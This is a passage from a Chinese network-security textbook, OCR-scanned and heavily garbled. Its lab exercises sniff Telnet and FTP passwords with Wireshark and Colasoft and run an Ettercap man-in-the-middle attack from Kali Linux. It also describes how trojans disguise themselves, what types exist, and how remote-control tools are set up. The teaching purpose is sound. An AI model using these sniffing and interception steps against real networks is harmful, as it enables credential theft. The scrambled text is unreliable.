VoIP 分析, 默认 选择 “全 面 分 析 ” 方 案 , 单 击 “ 开 始 " 按 钮 ,开始 实时 网 络 数据 捕获 ,如 


@ 片刻 之 后 单 击 红 色 “ 停 止 " 按 钮 , 若 想 了 解 当 前 计算 机 的 网 络 连接 情况 ,只 须 单 击 
“矩阵 ?选项 卡 , 即 可 弹出 该 计算 机 网 络 连接 情况 的 界面 :如 图 6-7 所 示 。 








| Co mg 和 版)] 


| 和 来 网 络 分 析 季 统 81 技术 交流 版 ce 
ESE 各 季 名 二 











和 
同 申 话 配器 快 态 “本 地 连接 


分 析 方 案 


到 同 同 回国 图 = 


全 面 分析 。“ MTT? 应 用 分 析 。 邮件 应 用 分 析 。 Ds 应 用 分 析 。“FT? 应 用 分 析 Ye 分析 











和 用 自动 保 丰 数据 包 
其 用 日 志 实 件 设置 








Top100 物理 会 话 


Top100 物理 节点 
2 一: 





239. 255. 255. 250 (1) 192.168.5.255(1) 


加 
图 6-7 计算 机 网 络 的 连接 情况 示意 图 


@ 单 击 “ 协 议 ” 选 项 卡 ,图 6-8 中 显示 的 是 捕获 到 的 协议 分 布 情况 。 

(3) 用 科 来 网 络 分 析 系 统 捕 获 敏感 数据 包 。 以 捕获 Telnet 密码 为 例 ,从 计算 机 
192. 168. 5. 1 远程 登录 到 计算 机 192. 168. 5.2, 用 科 来 网 络 分 析 系 统 捕 获 到 远程 登录 的 用 
户 名 和 密码 。 

@ 首次 打开 科 来 网 络 分 析 系 统 时 ,会 弹出 “选择 网 卡 ” 对 话 框 ,在 该 对 话 框 中 会 自动 
显示 本 机 当前 所 拥有 的 所 有 网 卡 ,只 要 选择 需要 监听 的 网 卡 就 可 以 了 。 

@ 报 文 捕获 功能 可 以 在 报 文 “ 捕 提 ? 面 板 中 完成 。 如 图 6-9 所 示 是 处 于 “停止 ”状态 

















Se-TI | 0.000 bps 
BT ur 0.000 bps 








下 ssm 0.000 tps 
BT ethI05 0. 000 bps 
0. 000 bps 


000 bps | 
0.000 bps | 
0.000 bps 
0.000 bps 
0.000 bps 

















图 6-8 协议 分 布 情况 
的 面板 ,各 个 按钮 的 功能 依次 是 网 络 适配器 的 设置 .捕获 开始 .捕获 停止 。 


@ 单 击 “开始 ”按钮 ,弹出 “开始 分 析 ? 对 话 框 ,如 图 6-10 所 示 , 单 击 * 是 "按钮 ,重新 开 
始 捕 提 ,“ 开 始 ” 按 钮 变 成 灰色 “停止 "按钮 变 成 红色 。 








@ 重新 开始 分 析 将 会 棚 除 当前 工程 歼 据 是 否 继续 ? 
Ec 
图 6-9 “捕捉 "面板 图 6-10 “开始 分 析 ” 对 话 框 





@ 在 本 地 计算 机 的 命令 提示 符 窗口 中 使 用 管理 员 账号 administrator 远程 登录 到 被 
管理 计算 机 192. 168. 5.2 .用 户 名 是 vip, 密 码 是 123 ,运行 telnet 命令 ,如 图 6-11 所 示 。 

@ 返回 科 来 网 络 分 析 系 统 主 界面 , 单 击 “ 捕 提 " 面 板 上 的 “停止 "按钮 ,双击 系统 主 界 
面 左 下 角 “ 节 点 浏览 器 ”面板 上 的 “协议 浏览 器 ”一 Ethernet>IP 司 TCP 一 TELNET 命令 。 
在 窗口 右 侧 单 击 “ 数 据 包 ”选项 卡 , 则 过 滤 出 所 有 TELNET 协议 的 数据 包 , 滑 动 右 侧 滑 
块 ,查看 “概要 ”字段 ,可 以 看 到 科 来 网 络 分 析 系 统 捕 提 到 的 敏感 信息 login: vviipp 和 
password:123, 如 图 6-12 所 示 。 


6G 42 任务 2: Wreshark 工 具 的 使 用 


1. 任务 目标 


掌握 Wireshark 的 安装 方法 ,熟练 掌握 使 用 Wireshark 分 析 数 据 包 的 3 个 步骤 : 选择 
数据 包 、 分 析 协 议 、 分 析 数 据 包 内 容 , 并 能 使 用 Wireshark 嗅 探 Telnet 过 程 。 











TTelnet 192.168.5.2 


耽 迎 


Escape 字符 为 “CTRL+] 


谤 吗 


cyvn?: n 


将 要 把 您 的 密码 信息 送 到 Internet 


(b) 





区 域内 的 一 台 远 程 计算 机 上 。， 


elcome to Microsoft Telnet Service 





icrosoft Telnet Server. 


:Wserswip)ca\ 


:Vdir 


@ 全 面 分 析 
日- 置 协 议 浏览 器 4) 
BE-T Ethernet II (3) 
| Tr 
‘日 Tr (1) 


-Twp () 

-TT IF O) 

-TARP 2) 
田 网 物 蝇 洲 此 器 2) 
由 -最 IF 浏览 器 2) 
vr 


2. 工作 任务 


(1) Wireshark 的 安装 。 


(d) 


图 6-11 远程 登录 命令 


16:49:41_172362 | 192 168. 5. 1:49179 


| 192. 168.5.2:23 





孝 据 包 编 虽 =24 





+ 
16:49:42 41385 | 192. 160.5.1:49179 
16:49-42 413968 | 192 168.5.2:23 


| 192. 100.5.2:23 
192. 168.5. 1:49179 


教 提包 唤 吕 -28 | 
孝 据 包 扩 号 2 





16:49-42 492833 | 192 168. 5149179 


| sz 168.5.2:23 


孝 据 包 编 号 -28 





16:49:42 493063 | 192 168 5.2:23 | 192 168 5149179 


EC 
[TI 


| 192. 168.5.1:49179 





18:49.43 293357 | 192 188.5 1-49179 


192. 188. 5.2.23 





16:49:43 295485 | 192 166.5.2:23 
16:49:44 212844 | 192. 168.5. 1-49179 
16:49:44.426543 | 192. 168.5. 1-49179 


| se. 168.5. 1:49179 
192. 168.5.2:23 
[192.168.5.2:23 





16:49:44 643835 | 192 168. 5 1-49179 


192. 168.5.2:23 








图 6-12 捕捉 的 敏感 信息 


(2) 用 Wireshark 捕获 数据 包 。 
(3) 设 定 Wireshark 过 滤 规 则 。 








ME 项 目 6 网 络 监听 工具 的 使 用 < 


(4) 从 捕获 数据 中 获得 敏感 信息 。 
3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相连 。 

(2) 软件 工具 : Wireshark 2. 0.2(64-bit) 工 具 。 

4. 实施 过 程 

(1) Wireshark 的 安装 。 下 载 Wireshark_win64_2. 0. 2. 0. 1457418327 软件 ,双击 安 
装 图 标 。 虽 然 安 装 界面 是 英文 版 ,但 操作 界面 是 中 文 版 ,所 以 基本 上 依次 单 击 Next\I 
Agree、Next 按钮 即 可 完成 安装 。 

(2) 用 Wireshark 捕获 数据 包 。 以 捕获 Telnet 密码 为 例 , 从 计算 机 192. 168. 5. 1 远 
程 登录 到 计算 机 192. 168. 5. 2, 用 Wireshark 捕获 到 远程 登录 的 用 户 名 和 密码 。 

具体 操作 步 又 如 下 。 

Oz 选择 “开始 ”一 Wireshark 命令 ,弹出 "Wireshark 网 络 分 析 器 "欢迎 窗口 ,指定 捕获 
数据 的 网 卡 “ 本 地 连接 ”, 双 击 即 可 ,如 图 6-13 所 示 。 

















获 
… 使 用 这 个 过 恶 器 : [大 策 入 捕 寺 过 下 器 … = 


一 


学 习 
用 户 指导 “。 wiki 。 问题 与 解答 。 邮件 列表 
正在 运行 Wiresharl2.0. 2 (v2.0.2-0-gal6e22e fron master-2.0). 按 受 自动 更 新 。 

















图 6-13 ”指定 捕获 网 络 适 配器 


@ 在 本 地 计算 机 的 命令 提示 符 窗口 使 用 管理 员 账 号 administrator 远程 登录 到 被 管 
理 计 算 机 192. 168. 5. 2, 用 户 名 是 vip, 密 码 是 123 ,运行 telnet 命令 。 

四 返回 Wireshark 主 界面 , 单 击 红色 方块 “停止 捕获 分 组 ”按钮 ,如 图 6-14 所 示 。 

(3) 设 定 Wireshark 过 滤 规 则 。 单 击 “ 应 用 显示 过 滤器 ”窗口 ,输入 Telnet ,窗口 颜色 
由 灰色 变 成 红色 最 后 变 成 绿色 ,表明 过 滤 规 则 输入 正确 。 按 Enter 键 后 ,过 滤 后 Protocol 
字段 内 容 全 部 变 成 Telnet 协议 ,捕获 的 数据 信息 全 部 与 Telnet 有 关 , 如 图 6-15 所 示 。 

(4) 从 捕获 数据 中 获得 敏感 信息 。 右 击 Info 字段 下 的 任意 一 个 Telnet Data ,选择 





| | 


正在 捕获 本 地 连接 





66 13.963251 
67 14.961453 
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62 Telnet Data 
92 Telnet Data 











图 6-15 Telnet 协议 过 滤 界 面 


“追踪 流 ”>“TCP 流 ” 命 令 ,在 弹出 的 对 话 框 中 可 以 看 到 标记 为 红色 的 敏感 信息 “login:. . 
*,. SFUTLNTVER. 2. SFUTLNTMODE. Console. . vviipp. password:123”, 如 图 6-16 
所 示 。 


G43 任务 3: 利用 Kdi Unux 操 作 系统 实施 Btercap 中间人 攻击 


1. 任务 目标 
利用 Kali Linux 操作 系统 使 用 Ettercap 工具 实现 中 间 人 攻击 。 








图 6-16 捕获 到 的 Telnet 敏感 信息 


2. 工作 任务 


(1) 在 Windows Server 2012 上 搭建 FTP 服务 器 。 
(2) 使 用 Ettercap 工具 实现 中 间 人 攻击 。 


3. 工作 环境 


(1) 一 台 预 装 Windows Server 2012 系统 作为 FTP 服务 器 的 主机 A。 
(2) 一 台 预 装 Kali Linux 系统 的 主机 B。 
(3) 一 台 作为 FTP 客户 端 预 装 Windows 7 系统 的 主机 C。 


4. 实施 过 程 


(1) 在 主机 A 上 搭建 FTP 服务器。 
(2) 在 主机 B 上 使 用 Ettercap 工具 实现 中 间 人 攻击 ,具体 操作 步骤 如 下 。 
@ 在 主机 B 上 使 用 下 列 命令 安装 Ettercap 工具 。 


root@kali:~# ettercap -G 


@ 弹出 Ettercap 主 界面 ,选择 Sniff> Unified sniffing 命令 ,使 用 Sniffer 抓 包 ,如 
图 6-17 所 示 。 





图 6-17 Ettercap 工具 界面 
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G 弹出 网 卡 设置 ,选择 监听 网 卡 eth0, 然 后 单 击 “ 确 定 ” 按 钮 ,如 图 6-18 所 示 。 







图 6-18 选择 监听 网 卡 
@ 选择 Hosts 一 Scan for hosts 命令 ,扫描 存在 的 主机 列表 ,如 图 6-19 所 示 。 








图 6-19 扫描 存在 的 主机 列表 


@ 在 主机 B 上 生成 主机 列表 ,选择 Hosts 一 Hosts list 命令 , 单 击 主机 列表 ,查看 被 
扫描 的 主机 ,如 图 6-20 所 示 。 









192.168.232.1 00:50:56:C0:00:08 
192.168.232.2 00:50:56:F5:E2:B1 
192.168.232.129 00:0C:29:B0:05:58 
192.168.232.130 00:0C:29:06:46:88 
fe80::bd68:a35c:5e88:be0d 00:0C:29:06:46:88 
192.168.232.254 00:50:56:FA:9E:39 





图 6-20 查看 被 扫描 的 主机 列表 


@ 在 主机 C 上 登录 主机 A 的 FTP 服务 器 ,并 输入 用 户 名 和 密码 。 

@ 在 主机 B 的 Ettercap 工具 界面 上 可 以 看 到 有 用 户 登 录 192. 168. 232. 129 主机 的 
FTP 服务 器 ,用 户 名 是 administrator, 密 码 是 abc@123 .如 图 6-21 所 示 。 

获取 这 些 信 息 后 停止 嗅 探 ,在 菜单 栏 中 选择 Start->~Stop sniffing 命令 。 

加 停止 嗅 探 后 ,还 需要 停止 中 间 人 攻击 ,在 菜单 栏 中 选择 Mitm>Stop mitm attack(s) 
命令 。 





[ 项目 6 网 络 监听 工具 的 使 用 ] @ 








[DHCP: [192.168.232.254] ACK : 192.168.232.130 255.255.255.0 GW 192.168.232.2 DNS 192.168.232.2 "localdomain” 
[DHCP: [192.168.232.254] ACK : 0.0.0.0 255.255.255.0 GW 192.168.232.2 DNS 192.168.232.2 "localdomain” 

FTP : 192.168.232.129:21 -> USER: anonymous PASS: User@ 

FTP : 192.168.232.129:21 -> USER: anonymous PASS: User@ 

FTP : 192.168.232.129:21 -> USER: administrator PASS: abc@123 

FTP : 192.168.232.129:21 -> USER: administrator PASS: abc@123 











图 6-21 利用 Ettercap 工具 捕获 到 的 敏感 信息 


6.5 常见 问题 解答 


TCP/IP 协议 中 ,数据 的 传输 单位 是 什么 ”测试 网 络 速度 的 常用 单位 是 什么 ? 

答 : TCP/IP 协议 中 ,数据 被 分 成 若干 个 包 (Packets ) 进行 传输 , 包 的 大 小 跟 操 作 系 
统 、 网 络 带宽 有 关 , 一 般 为 64、128、256、512、1024 等 , 包 的 单位 是 字 节 。 网 络 速度 通常 用 
Kb/s、Mb/s 来 表示 ,B 和 bb 分 别 代表 Byte( 字 节 ) 和 bit( 比 特 ),1B=8b。1Mby/s( 兆 比特 
每 秒 ) 二 1X1024/8B/s 二 128KB/s( 字 节 每 秒 )。 例 如 常见 的 ADSL 下 行 512K 指 的 是 每 
秒 传输 512Kb, 也 就 是 每 秒 512/8KB 一 64KB。 


6.6 认证 试题 


一 、 选 择 题 

1. 网 络 监听 是 ( )。 
A. 远程 观察 一 个 用 户 的 计算 机 B. 监视 网 络 的 状态 .传输 的 数据 流 
C, 监视 PC 系统 的 运行 情况 D. 监视 一 个 网 站 的 发 展 方向 


2. 下 面 关 于 几 个 网 络 管理 工具 的 描述 中 ,错误 的 是 (  )。 
A. netstat 可 用 于 显示 IP.TCP .UDP ICMP 等 协议 的 统计 数据 
B. Sniffer 能 够 使 网 络 接口 处 于 杂 收 模式 ,从 而 可 接收 网 络 上 传输 的 分 组 
C. winipcfg 采用 MS-DOS 工作 方式 显示 网 络 适配器 和 主机 的 有 关 信 息 
D. tracert 可 以 发 现 数据 包 到 达 目 标 主 机 所 经 过 的 路 由 器 和 到 达 时 间 
3. 嗅 探 器 可 以 使 网 络 接口 处 于 杂 收 模式 ,在 这 种 模式 下 ,网 络 接口 ( js 
A. 只 能 够 响应 与 本 地 网 络 接 口 硬件 地 址 相 匹 配 的 数据 帧 
B. 只 能 够 响应 本 网 段 的 广播 数据 帧 
C. 只 能 响应 组 播 信息 
D. 能 够 响应 流 经 网 络 接口 的 所 有 数据 帧 
4. 下 列 ( ) 不 是 Wireshark 的 功能 。 





A. 协议 分 析 B. 解密 C. 数据 监听 D. 流量 分 析 
5. 为 了 防御 网 络 监 听 , 最 常用 的 方法 是 ( $s 
A. 采用 物理 传输 B. 采用 无 线 传输 


C. 数据 加 密 D. 使 用 专线 传输 
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二 、 简 答题 


1. 常用 的 网 络 监听 工具 有 哪些 ? 
2. 网 络 嗅 探 器 的 工作 原理 是 什么 ? 


三 、 操 作 题 
利用 嗅 探 工具 嗅 探 FTP 登录 密码 。 


7.1 用 户 需 求 与 分 析 


远程 控制 本 来 用 于 专家 进行 远程 协助 ,解决 计算 机 系统 中 的 问题 ,但 该 技术 被 黑客 运 
用 后 ,就 变 成 了 攻击 他 人 计算 机 系统 的 一 种 手段 。 通 过 远程 控制 技术 ,黑客 可 以 获取 远程 
计算 机 的 许多 重要 信息 ,如 个 人 账号 和 密码 等 。 通 过 对 远程 计算 机 的 完全 控制 ,可 以 对 远 
程 计算 机 中 的 所 有 文件 进行 操作 修改 注册 表 、 监 视屏 幕 操作 的 一 举 一 动 ,甚至 可 以 实时 
控制 远程 计算 机 用 户 的 操作 ,如 锁定 键盘 、 远 程 关 机 等 ,就 像 在 自己 的 计算 机 中 一 样 。 


7.2 预备 知识 


7.21 远程 控制 的 原理 


远程 控制 是 指 利用 远程 控制 软件 在 两 台 计 算 机 之 间 建 立 一 条 数据 交换 的 通道 ,从 而 
使 主 控 端 可 以 向 被 控 端 发 送 指令 ,操纵 被 控 端 完成 某 些 特定 的 工作 。 要 实现 远程 控制 , 需 
要 满足 一 些 条 件 : 中 主 控 计算 机 和 被 控 计 算 机 都 处 在 网 络 中 ; 四 双方 都 使 用 相同 的 通信 
协议 ,一 般 使 用 TCP/IP 协议 进行 通信 ; @ 两 台 计算 机 上 都 必须 安装 远程 控制 软件 ,而 且 
一 台 必 须 配 置 成 被 控 端 ,而 另 一 台 配置 成 主 控 端 。 被 控 端 计算 机 等 候 与 主 控 端 计算 机 的 
连接 ,被 控 端 由 主 控 端 进行 控制 ,控制 被 控 端 计算 机 中 的 各 种 应 用 程序 运行 。 主 控 端 负 责 
发 送 指令 和 显示 远程 被 控 端 计算 机 执行 程序 的 结果 ,而 运行 程序 所 需要 的 系统 资源 都 由 
被 控 端 计算 机 负责 。 


722 认识 木马 


木马 是 目前 最 主要 的 网 络 安全 威胁 之 一 ,木马 的 全 名 叫 “ 特 洛 伊 木马 ”。 

木马 是 一 种 基于 C/S( 客 户 / 服 务 器 ) 模 式 的 远程 控制 程序 ,具有 隐蔽 性 、 非 授权 性 、 自 
动 运行 性 等 特点 。 隐 项 性 是 指 木马 程序 隐藏 于 服务 器 端 , 即 使 计算 机 用 户 发 现 计算 机 感 
染 了 木马 ,也 很 难 确定 木马 的 位 置 。 这 也 是 木马 程序 与 一 般 远程 控制 软件 最 大 的 区 别 。 
非 授 权 性 是 指控 制 端 和 服务 器 端 建立 连接 后 ,控制 端 就 拥有 了 服务 器 端的 大 部 分 操作 权 
限 ,包括 修改 和 删除 文件 ,修改 注册 表 、 控 制 键盘 和 鼠标 等 设备 操作 权限 。 自 动 运行 性 是 
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指 当 系统 启动 时 木马 程序 自动 运行 , 它 通 常 依附 在 系统 的 启动 配置 文件 中 ,例如 win. ini、 
system. ini、winstart. bat 以 及 启动 组 的 文件 中 。 

完整 的 木马 系统 由 硬件 .软件 和 网 络 连 接 三 部 分 组 成 。 硬 件 包 括 服务 器 端 和 控制 端 。 
服务 器 端 是 被 黑客 安装 木马 服务 程序 的 目标 计算 机 , 即 被 远程 控制 的 一 方 。 而 控制 端 是 
黑客 实施 远程 攻击 的 一 方 , 即 远程 控制 服务 器 端的 一 方 。 网 络 连 接 是 服务 器 端 和 控制 端 
之 间 的 通信 通道 ,为 服务 器 端 发 送 获取 的 信息 ,控制 端 发 送 控制 命令 提供 渠道 。 

木马 的 伪装 方式 主要 包括 修改 图 标 \ 捆 绑 文 件 、 出 错 提示 、 定 制 端口 、 自 我 销毁 、 自 动 
更 名 。 有 些 木 马 把 服务 器 端 程序 的 图 标 改 成 JPG、TXT、ZIP、HTML 等 各 种 文件 的 图 
标 , 具 有 很 强 的 迷惑 性 。 有 些 木 马 把 自己 捆绑 在 安装 程序 或 可 执行 文件 上 ,程序 运行 时 木 
马 服务 器 端 也 开始 运行 。 有 些 木马 具有 出 错 显 示 功 能 , 当 木 马 服务 器 端 用 户 打开 木马 程 
序 时 ,会 弹出 一 个 错误 提示 框 。 老 式 木马 端口 都 是 固定 的 ,新 式 木 马 的 端口 可 以 自 定 义 ， 
控制 端 用 户 可 以 指定 1024 一 65535 之 间 任 一 端口 作为 木马 端口 。 当 木马 在 服务 器 端 安装 
成 功 后 ,原木 马 文件 自动 销毁 ,这 样 服务 器 端 用 户 就 很 难 找到 木马 的 来 源 。 目 前 很 多 木马 
程序 可 以 由 控制 端 用 户 命 名 ,这 也 给 木马 的 查找 带 来 了 困难 。 


723 木马 的 发 展 与 分 类 


木马 程序 技术 发 展 至 今 ,已 经 经 历 了 四 代 : 第 一 代为 伪装 型 病毒 ,第 二 代为 AIDS 型 
木马 ,第 三 代为 网 络 传 播 型 木马 ,第 四 代为 隐形 木马 。 第 一 代 木 马 不 具 备 传染 性 , 它 通 过 
伪装 成 一 个 合法 程序 诱骗 用 户 上 当 。 第 二 代 木 马 通过 电子 邮件 进行 传播 。 第 三 代 木 马 增 
加 了 “后 门 ”功能 和 键盘 记录 功能 ,具有 伪装 和 传播 两 种 特点 。 第 四 代 木 马 采用 插入 内 核 
的 潜入 方式 ,利用 远程 插入 线程 技术 、 棒 入 DLL 线程 等 技术 实现 程序 隐藏 ,利用 反弹 端口 
技术 突破 防火 墙 限制 ,使 被 侵 用 户 毫 无 察觉 。 

按照 木马 的 特性 可 以 把 木马 分 为 破坏 型 .密码 发 送 型 键盘 记录 型 `,DoS 攻击 型 反弹 
端口 型 ,代理 型 和 远程 访问 型 等 。 破 坏 型 木马 破坏 并 删除 文件 ,能 自动 删除 目标 主机 上 的 
DLL INI .EXE 文件 ,一 旦 感染 就 严重 威胁 到 计算 机 的 安全 。 密 码 发 送 型 木马 能 找到 目 
标 主 机 的 隐藏 密码 ,并 把 它 发 送 到 指定 邮箱 。Windows 提供 的 密码 记忆 功能 使 用 户 不 必 
每 次 都 输入 账号 和 密码 ,这 类 木马 就 是 利用 这 一 点 获取 目标 主机 的 密码 ,大 多 数 使 用 
25 号 端口 发 送 邮 件 , 在 系统 启动 时 重新 运行 。 键 盘 记 录 木 马 记录 目标 主机 在 线 和 离线 状 
态 下 敲 击 键盘 的 情况 ,存储 在 日 志文 件 中 ,并 发 送 到 指定 邮箱 ,黑客 通过 分 析 键 盘 记 录 获 
得 密码 .信用 卡 账号 等 有 用 信息 。DosS 攻击 型 木马 的 危害 不 是 体现 在 被 感染 的 目标 主机 
上 ,而 是 体现 在 黑客 利用 它 来 攻击 其 他 计算 机 ,给 网 络 和 服务 造成 很 大 的 伤害 。 一 种 类 似 
的 DoS 攻击 型 木马 叫 作 邮件 炸弹 木马 ,目标 主机 一 旦 感染 , 则 会 生成 各 种 各 样 主题 的 邮 
件 , 向 特定 邮箱 不 停 地 发 送 邮件 ,直到 对 方 瘫痪 不 能 接收 邮件 为 止 。 与 一 般 的 木马 相反 ， 
反弹 端口 型 木马 的 被 控制 端 使 用 主动 端口 ,控制 端 使 用 被 动 端口 ,因为 防火 墙 对 于 进入 的 
链接 进行 严格 过 滤 , 对 于 出 去 的 链接 玻 于 防范 。 控 制 端的 被 动 端口 通常 设 为 80, 即 使 目 
标 主机 用 户 检查 自己 端口 时 发 现 80 端口 已 打开 ,也 可 能 以 为 是 自己 在 浏览 网 页 时 所 导致 
的 结果 。 代 理 木 马 是 黑客 发 动 攻击 的 跳板 ,在 入 侵 的 同时 掩盖 自己 的 踪迹 ,通过 代理 木 
马 ,黑客 可 以 匿名 使 用 Telnet 等 程序 ,掩饰 自己 的 身份 。 远 程 访问 型 木马 是 目前 使 用 最 
广泛 的 木马 ,是 一 种 基于 远程 控制 的 工具 ,能 远程 访问 目标 主机 的 硬盘 。 
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7.24 常见 远程 控制 工具 介绍 
下 面 介绍 两 种 最 常见 的 远程 控制 软件 。 
1. 多 点 远程 控制 软件 QuickIP 


对 网 络 管理 来 说 ,一 台 主 机 要 管理 多 台 计 算 机 ,需要 应 用 到 多 点 远程 控制 技术 ， 
QuickIP 就 是 一 款 具 有 多 点 远程 控制 技术 的 工具 。QuickIP 是 基于 TCP/IP 的 计算 机 远 
程控 制 软 件 , 使 用 QuickIP 可 以 通过 局 域 网 或 互联 网 全 权 控 制 远程 计算 机 。 服 务 器 可 以 
同时 被 多 个 客户 机 控制 ,一 个 客户 机 也 同时 控制 多 个 服务 器 。 

QuickIP 具有 FTP 功能 ,可 以 上 传 、. 下 载 远 程 文件 ,以 树 状 展示 远程 计算 机 所 有 磁盘 
驱动 器 的 内 容 ; 可 以 对 远程 主机 的 屏幕 进行 录像 ; 可 以 控制 远程 主机 的 鼠标 、 键 盘 , 就 像 
操作 本 地 计算 机 一 样 ; 可 以 控制 远程 的 录音 设备 ,具有 网 络 电 话 功 能 ; 可 以 控制 远程 计 
算 机 的 所 有 进程 、 窗 口 ,程序 ,控制 远程 主机 重新 启动 关机、 登录 等 。QuickIP 具有 安全 
的 密码 验证 ,客户 机 必须 知道 服务 器 密码 才能 进行 控制 ,网 络 数据 传输 采用 压缩 传输 , 因 
此 数据 传输 速度 快 并 且 很 安全 。QuickIP 具有 定位 功能 ,在 不 知道 远程 主机 IP 地 址 或 域 
名 的 情况 下 能 迅速 连接 到 远程 主机 上 。QuickIP 可 用 于 服务 器 管理 .远程 资源 共享 .网 吧 
机 器 管理 .远程 办 公 、 远 程 教育 ,排除 故障 .远程 监控 等 。 由 于 QuickIP 将 服务 器 端 和 客户 
端 合并 在 一 起 ,所 以 每 台 计 算 机 中 都 要 安装 服务 器 端 和 客户 端 , 这 样 ,安装 了 QuickIP 的 
网 络 计算 机 都 可 以 作为 客户 端 控制 其 他 计算 机 ,也 可 以 被 其 他 计算 机 控制 。 


2. 任 我 行 软件 


任 我 行 软件 是 一 款 功 能 强大 的 远程 控制 软件 , 它 的 功能 仅 次 于 灰 钥 子 远程 控制 软件 ， 
不 同 的 是 任 我 行 软件 提供 了 两 种 不 同 的 配置 类 型 ,更 易于 管理 。 黑 客 经 常 利用 这 款 软件 








来 监控 目标 主机 。 
7.3 方案 设计 
方案 设计 如 表 7-1 所 示 。 
表 7-1 方案 设计 
任务 名 称 远程 控制 

1. 使 用 远程 桌面 连接 远程 控制 计算 机 

(1) 远程 计算 机 的 设置 

(2) 本 地 计算 机 的 设置 

(3) 远程 控制 的 实现 


任务 分 解 | 。 。 使 用 QuickIP 对 多 点 计算 机 进行 远程 控制 


(1) 设置 QuickIP 服务 器 密码 
(2) 登录 客户 端 
(3) 查看 QuickIP 服务 器 信息 
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续 表 





.能 配置 远程 桌面 ,实现 远程 控制 
. 能 设置 QuickIP 服务 器 密码 

. 能 登录 QuickIP 客户 端 

能 查看 QuickIP 服务 器 信息 


.了解 远程 控制 的 原理 

. 了解 木马 的 来 源 

. 熟悉 木马 程序 的 特点 

. 熟悉 木马 的 伪装 方式 

. 了 解 木马 系统 的 组 成 

.了解 木马 的 分 类 与 发 展 


. 掌握 网 络 安全 行业 的 基本 情况 

. 具有 良好 的 团队 协作 和 沟通 交流 能 力 
. 培养 良好 的 职业 道德 

. 树立 较 强 的 安全 、 节 约 \ 环 保 意识 


能 力 目标 


上 mb 





知识 目标 


oo ho co 





素质 目标 


和 wm 





7.4 项 目 实施 
7.4 1 任务 + 使 用 远程 桌面 连接 远程 控制 计算 机 


1. 任务 目标 


了 解 远 程控 制 的 工作 原理 ,熟练 掌握 远程 计算 机 和 本 地 计算 机 的 配置 方法 ,实现 在 本 
地 计算 机 上 控制 远程 计算 机 ,使 两 地 的 计算 机 可 以 协同 工作 。 


2. 工作 任务 


(1) 远程 计算 机 的 设置 。 
(2) 本 地 计算 机 的 设置 。 
(3) 远程 控制 的 实现 。 


3. 工作 环境 
两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相连 。 
4. 实施 过 程 


(1) 远程 计算 机 的 设置。 

Q@ 设置 好 远程 计算 机 的 账号 和 密码 ,打开 远程 计算 机 的 命令 提示 符 窗 口 ,输入 命令 
net user guolindesktop 123 /add, 创 建 远程 计算 机 登录 账户 guolindesktop。 

@ 设置 好 远程 计算 机 账号 guolindesktop 的 权限 ,使 其 未 属于 remote desktop users 
组 。 在 远程 主机 的 命令 提示 符 窗 口中 执行 命令 net localgroup "remote desktop users" 
guolindesktop /add, 如 图 7-1 所 示 。 





:NUsers hdninistrator7iEE user guolindesktop 1230 7aaa - 
命令 成 功 完成 。 


加 完成 。 





图 7-1 远程 计算 机 的 登录 账号 创建 


@ 使 用 ipconfig 命令 查看 远程 计算 机 的 IP 地 址 ,本 任务 中 设 定 的 是 192. 168. 5. 2。 

@ 右 击 远程 计算 机 的 “计算 机 ?图 标 , 选 择 * 属 性 ”命令 ,在 弹出 的 窗口 中 单 击 “远程 设 
置 ?命令 ,在 “系统 属性 ?对 话 框 中 的 “远程 选项 卡 中 进行 设置 。 选 择 * 人 允许 远程 协助 连接 
这 台 计 算 机 ” 复 选 框 ,选择 “允许 运行 任意 版 本 远程 桌面 的 计算 机 连接 ( 较 不 安全 )” 单 选 按 
钮 ,如 图 7-2 所 示 。 





图 7-2 远程 计算 机 “远程 "设置 


@ 若 提示 需要 开启 防火 墙 . 则 需要 打开 “计算 机 管理 ”中 的 “服务 和 应 用 程序 ”窗口 ， 
启动 Windows Firewall 服务 ,如 图 7-3 所 示 。 

(2) 本 地 计算 机 的 设置 。 

@ 使 用 ipconfig 命令 查看 本 地 计算 机 的 IP 地 址 ,本 任务 中 设 定 的 是 192. 168. 5. 1 。 

@ 从 本 地 计算 机 Ping 远程 计算 机 的 IP 地 址 ,看 能 否 Ping 通 。 

@ 在 本 地 计算 机 中 选择 “开始 ”>“ 远 程 桌 面 连接 ”命令 ,在 弹出 的 “远程 桌面 连接 ” 
对 话 框 中 单 击 “ 选 项 ”按钮 ,在 “常规 ”选项 卡 中 ,填写 远程 计算 机 的 IP 地 址 和 用 户 名 , 单 
击 “ 连 接 ” 按 钮 ,在 弹出 的 “Windows 安全 ”对 话 框 中 输入 远程 计算 机 的 密码 ,如 图 7-4 
所 示 。 

@ 当 出 现 “ 无 法 验证 此 远程 计算 机 的 身份 。 是 否 仍 要 和 连接?” 时, 单 击 “ 是 ”按钮 ,如 
图 7-5 所 示 , 即 可 远程 登录 到 远程 计算 机 。 














图 7-4 本 地 计算 机 的 “远程 桌面 连接 ”设置 


(3) 远程 控制 的 实现 。 当 出 现 *“192. 168. 5. 2- 远 程 桌面 连接 ”窗口 时 , 即 实现 了 远程 
桌面 控制 ,如 图 7-6 所 示 。 


742 任务 2: 使 用 QuiddP 对 多 点 计算 机 进行 远程 控制 


1. 任务 目标 
熟练 掌握 使 用 QuickIP 通过 局 域 网 或 互联 网 全 权 控 制 远程 计算 机 。 服 务 器 可 以 同 
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图 7-5 忽略 远程 计算 机 身份 验证 图 7-6 实现 远程 桌面 连接 


时 被 多 个 客户 机 控制 ,一 个 客户 机 也 同时 控制 多 个 服务 器 。 利 用 QuickIP 以 树 状 展示 远 
程 计算 机 所 有 磁盘 驱动 器 的 内 容 , 对 远程 屏幕 进行 录像 ,控制 远程 主机 的 鼠标 、 键 盘 ,控制 
远程 计算 机 的 所 有 进程 、 窗 口 ,程序 ,控制 远程 主机 重新 启动 关机、 登录 等 。 


2. 工作 任务 


(1) 设置 QuickIP 服务 器 密码 。 
(2) 登录 客户 端 。 
(3) 查看 QuickIP 服务 器 信息 。 


3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相连 。 
(2) 软件 工具 : QuickIP 软件 。 


4. 实施 过 程 


(1) 设置 QuickIP 服务 器 密码 。QuickIP 具有 安全 的 密码 验证 功能 ,客户 端 必须 知 
道 服务 器 端的 密码 才 可 能 进行 控制 。 因 此 在 第 一 次 启动 QuickIP 服务 器 程序 时 会 提示 设 
置 本 地 服务 器 的 密码 ,具体 的 操作 步骤 如 下 。 

